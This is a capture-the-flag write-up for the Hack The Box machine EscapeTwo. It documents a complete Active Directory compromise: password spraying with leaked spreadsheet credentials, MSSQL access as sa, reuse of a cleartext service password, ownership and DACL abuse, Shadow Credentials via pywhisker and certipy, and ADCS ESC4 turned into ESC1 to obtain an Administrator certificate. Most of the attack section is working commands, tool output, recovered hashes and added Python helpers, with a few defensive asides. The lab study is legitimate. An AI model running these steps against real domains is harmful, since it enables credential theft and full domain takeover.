Hackthebox - EscapeTwo

EscapeTwo

10.10.11.51

MACHINE INFORMATION
As is common in real life Windows pentests, you will start this box with credentials for the following account: rose / KxEPkKe6R8su

Credentials handed out at the start: rose:KxEPkKe6R8su

SMB enumeration

Logging into the SMB service with the rose credentials turns up two xlsx files. One of them records the following (an xlsx is a zip archive, and its cell text is stored in xl/sharedStrings.xml, which is where this fragment comes from); it looks like there is a fair amount of spraying ahead.

<si>
<t xml:space="preserve">angela</t>
</si>
<si>
<t xml:space="preserve">0fwz7Q4mSpurIt99</t>
</si>
<si>
<t xml:space="preserve">oscar</t>
</si>
<si>
<t xml:space="preserve">86LxLBMgEWaKUnBG</t>
</si>
<si>
<t xml:space="preserve">kevin</t>
</si>
<si>
<t xml:space="preserve">Md9Wlq1E5bZnVDVo</t>
</si>
<si>
<t xml:space="preserve">sa</t>
</si>
<si>
<t xml:space="preserve">MSSQLP@ssw0rd!</t>
</si>

angela:0fwz7Q4mSpurIt99
oscar:86LxLBMgEWaKUnBG
kevin:Md9Wlq1E5bZnVDVo
sa:MSSQLP@ssw0rd!
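As an added example (not part of the original writeup), here is how to pull those pairs out of an .xlsx offline without opening a spreadsheet application. An .xlsx is a zip archive: every text cell is stored once in xl/sharedStrings.xml as <si><t>...</t></si> (the fragment above is that file), and the cells in xl/worksheets/sheetN.xml reference the table by index. The workbook in the block is constructed in memory from the values shown above; the header row and the two-column layout are assumptions.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

NS = "{http://schemas.openxmlformats.org/spreadsheetml/2006/main}"


def _shared_strings(zf: zipfile.ZipFile) -> list[str]:
    """Return xl/sharedStrings.xml as a list; the index is the <v> value sheet cells use."""
    if "xl/sharedStrings.xml" not in zf.namelist():
        return []                       # workbook with only numeric or inline-string cells
    root = ET.fromstring(zf.read("xl/sharedStrings.xml"))
    # a rich-text cell is split into several <r><t> runs; join them back into one string
    return ["".join(t.text or "" for t in si.iter(NS + "t")) for si in root.findall(NS + "si")]


def read_rows(xlsx_bytes: bytes, sheet: str = "xl/worksheets/sheet1.xml") -> list[dict]:
    """Parse one sheet into rows; each row maps a column letter to the resolved cell text."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        sst = _shared_strings(zf)
        root = ET.fromstring(zf.read(sheet))
    rows = []
    for row in root.iter(NS + "row"):
        cells = {}
        for c in row.findall(NS + "c"):
            col = re.match(r"[A-Z]+", c.get("r")).group(0)   # "B3" -> "B"
            kind = c.get("t")
            v = c.find(NS + "v")
            if kind == "s":                                  # index into the shared-string table
                cells[col] = sst[int(v.text)]
            elif kind == "inlineStr":                        # string stored inside the cell itself
                cells[col] = "".join(t.text or "" for t in c.iter(NS + "t"))
            else:                                            # number, bool or formula result
                cells[col] = v.text if v is not None else ""
        rows.append(cells)
    return rows


def credential_pairs(rows: list[dict], user_col: str = "A", pass_col: str = "B",
                     header: bool = True) -> list[tuple[str, str]]:
    """Zip a username column with a password column, skipping an optional header row."""
    return [(r[user_col], r[pass_col]) for r in rows[1 if header else 0:]
            if user_col in r and pass_col in r]


def build_sample_xlsx() -> bytes:
    """Constructed sample workbook: the four pairs from the writeup plus an assumed header row."""
    data = [("name", "password"), ("angela", "0fwz7Q4mSpurIt99"), ("oscar", "86LxLBMgEWaKUnBG"),
            ("kevin", "Md9Wlq1E5bZnVDVo"), ("sa", "MSSQLP@ssw0rd!")]
    strings = [s for pair in data for s in pair]
    sst = (f'<sst xmlns="{NS[1:-1]}">'
           + "".join(f'<si><t xml:space="preserve">{escape(s)}</t></si>' for s in strings)
           + "</sst>")
    body = "".join(
        f'<row r="{i}"><c r="A{i}" t="s"><v>{2 * (i - 1)}</v></c>'
        f'<c r="B{i}" t="s"><v>{2 * (i - 1) + 1}</v></c></row>'
        for i in range(1, len(data) + 1))
    sheet = f'<worksheet xmlns="{NS[1:-1]}"><sheetData>{body}</sheetData></worksheet>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:          # a real file also carries [Content_Types].xml etc.
        zf.writestr("xl/sharedStrings.xml", sst)
        zf.writestr("xl/worksheets/sheet1.xml", sheet)
    return buf.getvalue()


if __name__ == "__main__":
    for user, pw in credential_pairs(read_rows(build_sample_xlsx())):
        print(f"{user}:{pw}")          # user:pass lines, ready to split into spray lists
```

Split the output into a user list and a password list and spray every combination against SMB (the writeup does this with CrackMapExec); trying each password against every account, not just its own row, is what surfaces reuse like the oscar hit below.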

The other xlsx did not seem to hold anything useful; all it yielded was a binary printer-settings file.

Password spraying

(screenshot: smb-cme)
Spraying the recovered pairs against SMB, oscar:86LxLBMgEWaKUnBG is the one that logs in.

MSSQL

(screenshot: login-success)
sa:MSSQLP@ssw0rd! logs into MSSQL successfully.
(screenshots: steal-hash, ntlm-sqlsvc: an NTLM hash for the sql_svc account obtained from the SQL server)

hashcat does not crack it, so change approach.
(screenshots: mssqlclient, sql-Configuration.INI)
From the mssqlclient session as sa we reach the SQL Server setup file sql-Configuration.INI on disk, which stores the service account password in clear text:
SEQUEL\sql_svc:WqSZAF6CysDQbGb3
(screenshot: winrm-pwned)
The same password is reused by ryan, who is allowed to log in over WinRM:
ryan:WqSZAF6CysDQbGb3
(screenshot: user-flag)

Privilege escalation

(screenshot: dc-shell)
PSRemoting did not get much further.
(screenshot: certipy)
Synced the clock with the DC first (Kerberos rejects requests once the clock skew passes five minutes, so the certificate and Kerberoast tooling needs it).
(screenshot: targetedKerberoast.py)
hashcat does not crack this one either, second time around.

BloodHound

Shadow Credentials

(screenshot: bl1: BloodHound shows the path from ryan to ca_svc; the owneredit below succeeds, so ryan holds WriteOwner over the ca_svc object)

$ impacket-owneredit -action write -new-owner 'ryan' -target 'ca_svc' 'SEQUEL.HTB'/'ryan':'WqSZAF6CysDQbGb3'
[*] Current owner information below
[*] - SID: S-1-5-21-548670397-972687484-3496335370-1114
[*] - sAMAccountName: ryan
[*] - distinguishedName: CN=Ryan Howard,CN=Users,DC=sequel,DC=htb
[*] OwnerSid modified successfully!

$ impacket-dacledit -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] DACL backed up to dacledit-20250114-235146.bak
[*] DACL modified successfully!

First take ownership of ca_svc (owneredit), then grant ryan FullControl on the object (dacledit). With that we can write msDS-KeyCredentialLink on ca_svc and use Shadow Credentials to obtain its NT hash. dacledit backed the original DACL up to dacledit-20250114-235146.bak; put it back when done.

$ pywhisker -d "sequel.htb" -u "ryan" -p "WqSZAF6CysDQbGb3" --target "ca_svc" --action "add"
[*] Searching for the target account
[*] Target user found: CN=Certification Authority,CN=Users,DC=sequel,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 6c14e8ad-83fd-f650-3381-bde53c035c06
[*] Updating the msDS-KeyCredentialLink attribute of ca_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: 9xUY4Qsk.pfx
[*] Must be used with password: OWezRO9HwuwZlhSAstBH
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
$ python3 gettgtpkinit.py sequel.htb/ca_svc -cert-pfx 9xUY4Qsk.pfx -pfx-pass OWezRO9HwuwZlhSAstBH ccache
2025-01-14 21:12:28,845 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-01-14 21:12:28,851 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2025-01-14 21:12:29,126 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-01-14 21:12:29,126 minikerberos INFO fabb6e6becd4efaed3a6740783d54c9bdc405f097f351433fa9b3bb3852883ba
INFO:minikerberos:fabb6e6becd4efaed3a6740783d54c9bdc405f097f351433fa9b3bb3852883ba
2025-01-14 21:12:29,131 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
$ python3 getnthash.py sequel.htb/ca_svc -key fabb6e6becd4efaed3a6740783d54c9bdc405f097f351433fa9b3bb3852883ba
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
3b181b914e7a9d5508ea1e20bc2b7fce

That gives us ca_svc's NT hash. certipy can do the whole thing in one step, and it restores the previous KeyCredentials afterwards:

$ certipy shadow auto -u [email protected] -p 'WqSZAF6CysDQbGb3' -account 'ca_svc'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'e3236247-9699-f7ee-b545-5f22eb1c1b2c'
[*] Adding Key Credential with device ID 'e3236247-9699-f7ee-b545-5f22eb1c1b2c' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID 'e3236247-9699-f7ee-b545-5f22eb1c1b2c' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': 3b181b914e7a9d5508ea1e20bc2b7fce
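What pywhisker and certipy actually write is a single msDS-KeyCredentialLink value on ca_svc: a DN-Binary string wrapping a KEYCREDENTIALLINK_BLOB that carries the public key, its SHA-256 KeyID, the DeviceID the tools print, and a creation timestamp. The block below is an added example, not code from the writeup or from either tool. It builds such a value for a constructed dummy key (a real one is a BCRYPT_RSAKEY_BLOB) using the DeviceID and target DN from the pywhisker output above, then decodes it the way a defender would when reviewing the attribute or a directory-change event. The mixed-endian GUID layout and the KeyID = SHA-256(KeyMaterial) rule follow how DSInternals/pywhisker serialise the entry; treat both as assumptions.

```python
import hashlib
import struct
import uuid
from datetime import datetime, timedelta, timezone

KEYCRED_VERSION = 0x200                    # KEYCREDENTIALLINK_BLOB version written by current Windows
ENTRY_NAMES = {0x01: "KeyID", 0x02: "KeyHash", 0x03: "KeyMaterial", 0x04: "KeyUsage",
               0x05: "KeySource", 0x06: "DeviceId", 0x07: "CustomKeyInformation",
               0x08: "KeyApproximateLastLogonTimeStamp", 0x09: "KeyCreationTime"}
KEY_USAGE_NGC = 0x01                       # "Next Generation Credential": what shadow-credential tools write
KEY_SOURCE_AD = 0x00
_EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def _filetime(dt: datetime) -> bytes:
    """Windows FILETIME: 100 ns ticks since 1601-01-01 UTC, little-endian u64."""
    return struct.pack("<Q", ((dt - _EPOCH_1601) // timedelta(microseconds=1)) * 10)


def _from_filetime(raw: bytes) -> datetime:
    return _EPOCH_1601 + timedelta(microseconds=struct.unpack("<Q", raw)[0] // 10)


def build_blob(key_material: bytes, device_id: uuid.UUID, created: datetime) -> bytes:
    """Assemble a KEYCREDENTIALLINK_BLOB: u32 version, then entries of (u16 length, u8 id, value)."""
    entries = [
        (0x01, hashlib.sha256(key_material).digest()),  # KeyID = SHA-256 of the key material (assumption)
        (0x03, key_material),
        (0x04, bytes([KEY_USAGE_NGC])),
        (0x05, bytes([KEY_SOURCE_AD])),
        (0x06, device_id.bytes_le),                     # GUID in the Windows mixed-endian layout (assumption)
        (0x09, _filetime(created)),
    ]
    body = b"".join(struct.pack("<HB", len(v), ident) + v for ident, v in entries)
    return struct.pack("<I", KEYCRED_VERSION) + body


def to_dn_binary(blob: bytes, dn: str) -> str:
    """LDAP DN-Binary syntax: B:<number of hex chars>:<hex>:<DN of the object holding the value>."""
    hx = blob.hex().upper()
    return f"B:{len(hx)}:{hx}:{dn}"


def parse_dn_binary(value: str) -> dict:
    """Decode one msDS-KeyCredentialLink value; raises ValueError on anything malformed."""
    tag, count, hx, dn = value.split(":", 3)
    if tag != "B" or int(count) != len(hx):
        raise ValueError("not a DN-Binary value")
    blob = bytes.fromhex(hx)
    (version,) = struct.unpack_from("<I", blob, 0)
    if version != KEYCRED_VERSION:
        raise ValueError(f"unexpected KeyCredentialLink version {version:#x}")
    raw, pos = {}, 4
    while pos < len(blob):
        length, ident = struct.unpack_from("<HB", blob, pos)
        pos += 3
        if pos + length > len(blob):
            raise ValueError("truncated entry")
        raw[ENTRY_NAMES.get(ident, f"0x{ident:02x}")] = blob[pos:pos + length]
        pos += length
    return {
        "dn": dn,
        "device_id": str(uuid.UUID(bytes_le=raw["DeviceId"])) if "DeviceId" in raw else None,
        "key_usage": raw["KeyUsage"][0] if "KeyUsage" in raw else None,
        "created": _from_filetime(raw["KeyCreationTime"]) if "KeyCreationTime" in raw else None,
        # consistency check a reviewer wants: KeyID must equal SHA-256 of the key material
        "keyid_ok": ("KeyID" in raw and "KeyMaterial" in raw
                     and hashlib.sha256(raw["KeyMaterial"]).digest() == raw["KeyID"]),
        "entries": sorted(raw),
    }


def sample_record() -> dict:
    """Constructed sample: dummy key bytes, plus the DeviceID and target DN from the pywhisker output."""
    created = datetime(2025, 1, 14, 21, 10, 0, tzinfo=timezone.utc)
    blob = build_blob(b"RSA1" + bytes(60),                                 # stand-in for a BCRYPT_RSAKEY_BLOB
                      uuid.UUID("6c14e8ad-83fd-f650-3381-bde53c035c06"),
                      created)
    value = to_dn_binary(blob, "CN=Certification Authority,CN=Users,DC=sequel,DC=htb")
    return parse_dn_binary(value)


if __name__ == "__main__":
    rec = sample_record()
    print(f"{rec['dn']}: DeviceId {rec['device_id']} usage {rec['key_usage']} "
          f"created {rec['created']:%Y-%m-%d %H:%M:%S} keyid_ok={rec['keyid_ok']}")
```

On the defensive side this is the attribute to watch: with a SACL on msDS-KeyCredentialLink, event 5136 on the DC records the write together with the DN-Binary value, and the decoded DeviceID and creation time line up with what the attacker's tool printed. A KeyCredential on a service account that has never enrolled a Windows Hello key is the tell; note that certipy's auto mode removes its entry again right after the TGT, so the write and the delete land seconds apart.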

ADCS-ESC4

(screenshot: bl2)

Running certipy find as ca_svc flags ESC4 on DunderMifflinAuthentication: Cert Publishers has Full Control over the template object, and ca_svc can write it (the template update below succeeds). The plan is to rewrite the template so that the enrollee supplies the subject, request a certificate carrying the Administrator UPN, and authenticate with it. -save-old keeps the original template definition in a JSON file so it can be put back afterwards.

$ certipy find -u [email protected] -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -dc-ip 10.10.11.51  -target-ip 10.10.11.51 -vulnerable -stdout              

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
[*] Got CA configuration for 'sequel-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : sequel-DC01-CA
DNS Name : DC01.sequel.htb
Certificate Subject : CN=sequel-DC01-CA, DC=sequel, DC=htb
Certificate Serial Number : 152DBD2D8E9C079742C0F3BFF2A211D3
Certificate Validity Start : 2024-06-08 16:50:40+00:00
Certificate Validity End : 2124-06-08 17:00:40+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : SEQUEL.HTB\Administrators
Access Rights
ManageCertificates : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
ManageCa : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Enroll : SEQUEL.HTB\Authenticated Users
Certificate Templates
0
Template Name : DunderMifflinAuthentication
Display Name : Dunder Mifflin Authentication
Certificate Authorities : sequel-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectRequireCommonName
SubjectAltRequireDns
Enrollment Flag : AutoEnrollment
PublishToDs
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1000 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Enterprise Admins
Full Control Principals : SEQUEL.HTB\Cert Publishers
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
Write Property Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
[!] Vulnerabilities
ESC4 : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions
$ certipy template -u [email protected] -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -template DunderMifflinAuthentication -save-old                         

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved old configuration for 'DunderMifflinAuthentication' to 'DunderMifflinAuthentication.json'
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'
$ certipy req -u [email protected] -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -ca sequel-DC01-CA -target-ip 10.10.11.51 -template DunderMifflinAuthentication -upn [email protected] -dns 10.10.11.51
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 25
[*] Got certificate with multiple identifications
UPN: '[email protected]'
DNS Host Name: '10.10.11.51'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator_10.pfx'

(screenshot: certipy3)

Two things in the request output deserve attention. "Certificate has no object SID" means certipy did not embed the szOID_NTDS_CA_SECURITY_EXT SID extension in this request; a DC running in full-enforcement mode for strong certificate mapping (KB5014754) would refuse to map such a certificate to Administrator, so the step depends on that enforcement not being active. And the template has been left in its rewritten state: restore it from the saved JSON with certipy template ... -template DunderMifflinAuthentication -configuration DunderMifflinAuthentication.json once finished.
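To make the ESC4 to ESC1 step concrete, here is an added example (my code, not Certipy's) that scores a template from the attributes Certipy printed above and shows what the rewrite changes. DunderMifflinAuthentication is filled in from the find output; the principal set for ca_svc (Cert Publishers, the only non-admin writer on the template and therefore how ca_svc could rewrite it) and the reduction of Certipy's default template configuration to four attribute changes are assumptions. The constants are the msPKI-Certificate-Name-Flag and msPKI-Enrollment-Flag bits and the EKU OIDs.

```python
from dataclasses import dataclass, replace

# msPKI-Certificate-Name-Flag bits
ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
SUBJECT_ALT_REQUIRE_DNS = 0x08000000
SUBJECT_REQUIRE_COMMON_NAME = 0x40000000
# msPKI-Enrollment-Flag bits
PEND_ALL_REQUESTS = 0x00000002          # shown by Certipy as "Requires Manager Approval"
PUBLISH_TO_DS = 0x00000008
AUTO_ENROLLMENT = 0x00000020

EKU_SERVER_AUTH = "1.3.6.1.5.5.7.3.1"
EKU_CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"
EKU_SMARTCARD_LOGON = "1.3.6.1.4.1.311.20.2.2"
EKU_PKINIT_CLIENT = "1.3.6.1.5.2.3.4"
EKU_ANY_PURPOSE = "2.5.29.37.0"
EKU_CERT_REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"
AUTH_EKUS = {EKU_CLIENT_AUTH, EKU_SMARTCARD_LOGON, EKU_PKINIT_CLIENT, EKU_ANY_PURPOSE}

PRIVILEGED = frozenset({"Administrator", "Administrators", "Domain Admins", "Enterprise Admins"})


@dataclass(frozen=True)
class Template:
    name: str
    enabled: bool
    name_flag: int
    enrollment_flag: int
    ra_signatures: int            # "Authorized Signatures Required"
    ekus: frozenset
    enroll: frozenset             # principals holding Enroll
    control: frozenset            # principals with Owner / WriteDacl / WriteOwner / WriteProperty


def assess(t: Template, me: frozenset) -> list:
    """Return the ESC findings for `t` as seen by an account whose principals are `me`.
    Simplified from Certipy's checks: ESC1-3 need enrollment without a manager/RA gate."""
    if not t.enabled:
        return []
    findings = []
    can_enroll = bool(t.enroll & me)
    ungated = not (t.enrollment_flag & PEND_ALL_REQUESTS) and t.ra_signatures == 0
    authn = not t.ekus or bool(t.ekus & AUTH_EKUS)          # an empty EKU list means any purpose
    if can_enroll and ungated and authn and t.name_flag & ENROLLEE_SUPPLIES_SUBJECT:
        findings.append("ESC1")                             # requester chooses the subject/SAN
    if can_enroll and ungated and (not t.ekus or EKU_ANY_PURPOSE in t.ekus):
        findings.append("ESC2")
    if can_enroll and ungated and EKU_CERT_REQUEST_AGENT in t.ekus:
        findings.append("ESC3")
    if t.control - PRIVILEGED:
        findings.append("ESC4")                             # a non-admin can rewrite the template
    return findings


def rewrite_for_esc1(t: Template, principal: str = "Authenticated Users") -> Template:
    """Assumed reduction of what `certipy template` applies by default: subject supplied by the
    enrollee, no approval or signatures, client-auth EKU, and enrollment for everyone."""
    return replace(t, name_flag=ENROLLEE_SUPPLIES_SUBJECT, enrollment_flag=0, ra_signatures=0,
                   ekus=frozenset({EKU_CLIENT_AUTH}),
                   enroll=t.enroll | {principal}, control=t.control | {principal})


# Filled in from the `certipy find` output above.
DUNDER_MIFFLIN = Template(
    name="DunderMifflinAuthentication", enabled=True,
    name_flag=SUBJECT_REQUIRE_COMMON_NAME | SUBJECT_ALT_REQUIRE_DNS,
    enrollment_flag=AUTO_ENROLLMENT | PUBLISH_TO_DS, ra_signatures=0,
    ekus=frozenset({EKU_CLIENT_AUTH, EKU_SERVER_AUTH}),
    enroll=frozenset({"Domain Admins", "Enterprise Admins"}),
    control=frozenset({"Enterprise Admins", "Cert Publishers", "Domain Admins", "Administrator"}),
)
# Assumption: ca_svc reaches the template through Cert Publishers, the only non-admin writer.
CA_SVC = frozenset({"ca_svc", "Authenticated Users", "Cert Publishers"})


def before_and_after() -> tuple:
    """Findings for ca_svc against the template as found and after the rewrite."""
    return assess(DUNDER_MIFFLIN, CA_SVC), assess(rewrite_for_esc1(DUNDER_MIFFLIN), CA_SVC)


if __name__ == "__main__":
    before, after = before_and_after()
    print("as found:      ", before)       # ['ESC4']
    print("after rewrite: ", after)        # ['ESC1', 'ESC4']
```

The point the two runs make is that ESC4 is not an attack by itself: it is write access that lets you manufacture ESC1, which is why the fix is the template ACL (remove Cert Publishers' Full Control) rather than any single flag.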

Closing

This is the first Active Machine with a domain-pentest component I have taken down. BloodHound was a big help with ideas in the later part; even without prior exposure to this area you can follow the path to learn and get familiar with it.
The earlier stages were almost all information gathering and user enumeration, which was quite fun. Looking forward to the Season 7 machines.
done